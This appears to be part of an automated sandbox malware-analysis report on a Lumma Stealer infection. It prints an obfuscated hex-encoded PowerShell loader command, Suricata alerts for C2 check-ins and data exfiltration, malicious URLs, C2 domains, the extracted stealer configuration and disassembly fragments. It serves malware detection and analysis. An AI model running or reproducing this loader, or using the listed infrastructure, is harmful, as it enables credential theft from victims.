FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BD

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:58:25.090129+0100	2028371	3	Unknown Traffic	192.168.2.4	49889	188.114.97.3	443	TCP
2024-12-31T08:58:26.062022+0100	2028371	3	Unknown Traffic	192.168.2.4	49897	188.114.97.3	443	TCP
2024-12-31T08:58:27.075762+0100	2028371	3	Unknown Traffic	192.168.2.4	49904	188.114.97.3	443	TCP
2024-12-31T08:58:28.329424+0100	2028371	3	Unknown Traffic	192.168.2.4	49913	188.114.97.3	443	TCP
2024-12-31T08:58:29.569974+0100	2028371	3	Unknown Traffic	192.168.2.4	49919	188.114.97.3	443	TCP
2024-12-31T08:58:30.989336+0100	2028371	3	Unknown Traffic	192.168.2.4	49928	188.114.97.3	443	TCP
2024-12-31T08:58:31.963297+0100	2028371	3	Unknown Traffic	192.168.2.4	49936	188.114.97.3	443	TCP
2024-12-31T08:58:33.050798+0100	2028371	3	Unknown Traffic	192.168.2.4	49945	188.114.97.3	443	TCP
2024-12-31T08:58:34.513994+0100	2028371	3	Unknown Traffic	192.168.2.4	49951	185.161.251.21	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:58:25.555547+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49889	188.114.97.3	443	TCP
2024-12-31T08:58:26.390403+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49897	188.114.97.3	443	TCP
2024-12-31T08:58:33.660394+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49945	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:58:25.555547+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49889	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:58:26.390403+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49897	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:58:25.090129+0100	2058661	1	Domain Observed Used for C2 Detected	192.168.2.4	49889	188.114.97.3	443	TCP
2024-12-31T08:58:26.062022+0100	2058661	1	Domain Observed Used for C2 Detected	192.168.2.4	49897	188.114.97.3	443	TCP
2024-12-31T08:58:27.075762+0100	2058661	1	Domain Observed Used for C2 Detected	192.168.2.4	49904	188.114.97.3	443	TCP
2024-12-31T08:58:28.329424+0100	2058661	1	Domain Observed Used for C2 Detected	192.168.2.4	49913	188.114.97.3	443	TCP
2024-12-31T08:58:29.569974+0100	2058661	1	Domain Observed Used for C2 Detected	192.168.2.4	49919	188.114.97.3	443	TCP
2024-12-31T08:58:30.989336+0100	2058661	1	Domain Observed Used for C2 Detected	192.168.2.4	49928	188.114.97.3	443	TCP
2024-12-31T08:58:31.963297+0100	2058661	1	Domain Observed Used for C2 Detected	192.168.2.4	49936	188.114.97.3	443	TCP
2024-12-31T08:58:33.050798+0100	2058661	1	Domain Observed Used for C2 Detected	192.168.2.4	49945	188.114.97.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (imbibelubmbe .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:58:24.585041+0100	2058660	1	Domain Observed Used for C2 Detected	192.168.2.4	53299	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T08:58:32.485383+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49936	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cegu.shop/U	Avira URL Cloud: Label: malware
Source: https://cegu.shop/	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtopw	Avira URL Cloud: Label: malware
Source: https://cegu.shop:443/8574262446/ph.txt	Avira URL Cloud: Label: malware
Source: https://deduhko.klipzyroloo.shop	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtebKit/537.36	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtI	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txta=	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txtSVHj	Avira URL Cloud: Label: malware
Source: https://cegu.shop/C	Avira URL Cloud: Label: malware
Source: https://cegu.shop/x	Avira URL Cloud: Label: malware
Source: https://deduhko.klipzyroloo.shop/mazkk.eml	Avira URL Cloud: Label: malware
Source: https://deduhko.klipzyroloo.shop/mazLR	Avira URL Cloud: Label: malware
Source: https://deduhko.klipzyroloo.shop/mazkk.	Avira URL Cloud: Label: malware

Found malware configuration

Source: 10.2.powershell.exe.370000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "noisycuttej.shop", "imbibelubmbe.click", "tirepublicerj.shop", "abruptyopsn.shop", "framekgirus.shop", "cloudewahsj.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "jMw1IE--SHELLS"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Sample uses string decryption to hide its real strings

Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: cloudewahsj.shop
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: rabidcowse.shop
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: noisycuttej.shop
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: tirepublicerj.shop
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: framekgirus.shop
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: wholersorie.shop
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: abruptyopsn.shop
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: nearycrepso.shop
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: imbibelubmbe.click
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: - Screen Resoluton:
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: Workgroup: -
Source: 10.2.powershell.exe.370000.0.unpack	String decryptor: jMw1IE--SHELLS

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 10_2_0038A5C1 CryptUnprotectData,

10_2_0038A5C1

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49913 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49951 version: TLS 1.2

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000004.00000002.2549625066.0000000008060000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000004.00000002.2549625066.0000000008060000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06720A1Bh	4_2_06720658
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06720A1Bh	4_2_0672064A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06720F86h	4_2_06720DB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06720F86h	4_2_06720DA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	10_2_003B10A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_0037E9AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	10_2_003AE41E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	10_2_003AE41E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ecx], dx	10_2_003B0C70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	10_2_003AE480
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	10_2_003AE480
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6B77B5E1h	10_2_003B0E20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6E87DD67h	10_2_003ABE00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4E1D27A6h]	10_2_003ABE00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	10_2_00392F20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, dword ptr [esi+18h]	10_2_0037AF0D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-202C4D60h]	10_2_0037CF4B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-202C4D60h]	10_2_0037CF4B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx-1FFDB51Dh]	10_2_0037DF94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, edi	10_2_0038E92F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [ebx+eax], 0000h	10_2_0038E92F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [edx+ecx], 0000h	10_2_0038E92F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	10_2_0039A100
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_0039A100
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ecx], dx	10_2_00385102
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [esi], cl	10_2_0039D1BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, eax	10_2_00375980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebp, eax	10_2_00375980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-21379170h]	10_2_003791F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, dh	10_2_003AF9D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	10_2_0039BA30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [esp+00000274h], 2031514Eh	10_2_0039D22E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	10_2_003B1220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1FFDB641h]	10_2_00387A10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [edi], cl	10_2_0039EA12
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+14h]	10_2_00393A00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00393A00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00393A00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then inc eax	10_2_00390270
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, word ptr [esi]	10_2_003AF250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ebx	10_2_003AF250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, dh	10_2_003AF250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [ecx], al	10_2_0038DAA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	10_2_003AC280
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_003862C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [ebx+eax], 0000h	10_2_0038AB34
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+40h]	10_2_0038CB70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	10_2_00398B70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, dword ptr [ebp-20h]	10_2_00398B70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, edx	10_2_00398B70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, bx	10_2_003973AE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	10_2_0039C3F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ebx	10_2_003AF430
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, dh	10_2_003AF430
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1FFDB715h]	10_2_00388C28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	10_2_00394428
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	10_2_00372C00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+0Ch]	10_2_0038B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-1FFDB731h]	10_2_0038B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0Ch]	10_2_0038B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then lea edx, dword ptr [ecx+20h]	10_2_0039D460
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	10_2_003AFC60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then lea edx, dword ptr [ecx+20h]	10_2_0039D464
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ecx], dx	10_2_0039A458
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then lea eax, dword ptr [edi+ebp]	10_2_0037BC41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+177C9E48h]	10_2_0037C44A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	10_2_003984B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, dword ptr [ebp-20h]	10_2_003984B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, edx	10_2_003984B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	10_2_003774E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	10_2_003774E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00388CE7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	10_2_003984D0
